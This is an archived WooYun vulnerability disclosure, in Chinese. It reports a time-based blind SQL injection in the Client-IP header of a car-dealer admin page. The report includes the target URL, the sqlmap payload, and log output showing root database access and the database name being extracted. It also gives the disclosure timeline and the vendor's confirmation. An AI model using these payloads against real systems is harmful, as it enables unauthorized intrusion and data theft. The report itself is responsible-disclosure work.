乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-10: 细节已通知厂商并且等待厂商处理中 2015-08-11: 厂商已经确认,细节仅向厂商公开 2015-08-21: 细节向核心白帽子及相关领域专家公开 2015-08-31: 细节向普通白帽子公开 2015-09-10: 细节向实习白帽子公开 2015-09-25: 细节向公众公开
汽车点评某站存在SQL盲注
注入点:
GET /d_admin/checkcodeimg.php HTTP/1.1Host: dealer.xgo.com.cnClient-IP: *
Client-IP 存在时间盲注
放到sqlmapuser: 'root'@'192.168.50.65' ROOT权限!
[17:32:37] [INFO] resuming back-end DBMS 'mysql' [17:32:37] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: Client-IP #1* ((custom) HEADER) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: ' AND (SELECT * FROM (SELECT(SLEEP(5)))NNPs) AND 'RfGj'='RfGj---[17:32:37] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[17:32:37] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0.12[17:32:37] [INFO] fetching database users[17:32:37] [INFO] fetching number of database users[17:32:37] [WARNING] time-based comparison requires larger statistical model, please wait............................. [17:32:45] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)[17:32:48] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 1[17:32:54] [INFO] retrieved: 'root'@'192.168.50[17:39:40] [ERROR] invalid character detected. retrying...6[17:40:51] [ERROR] invalid character detected. retrying..5'database management system users [1]:[*] 'root'@'192.168.50.65'[17:41:29] [INFO] fetched data logged to text files under '/root/.sqlmap/output/dealer.xgo.com.cn'
current-db: 'xgo_dealer'
[17:49:15] [INFO] parsing HTTP request from 'httpreqTest/dealer.xgo.com.cn-wvs.txt'[17:49:15] [INFO] loading tamper script 'space2comment'custom injection marking character ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] [17:49:17] [INFO] resuming back-end DBMS 'mysql' [17:49:17] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: Client-IP #1* ((custom) HEADER) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: ' AND (SELECT * FROM (SELECT(SLEEP(10)))NNPs) AND 'RfGj'='RfGj---[17:49:17] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[17:49:17] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0.12[17:49:17] [INFO] fetching current database[17:49:17] [WARNING] time-based comparison requires larger statistical model, please wait............................. [17:49:24] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)[17:49:34] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors x[17:51:05] [ERROR] invalid character detected. retrying..go_dealercurrent database: 'xgo_dealer'[17:57:24] [INFO] fetched data logged to text files under '/root/.sqlmap/output/dealer.xgo.com.cn'
过滤或者转义
危害等级:高
漏洞Rank:16
确认时间:2015-08-11 09:14
感谢,已经安排修复
暂无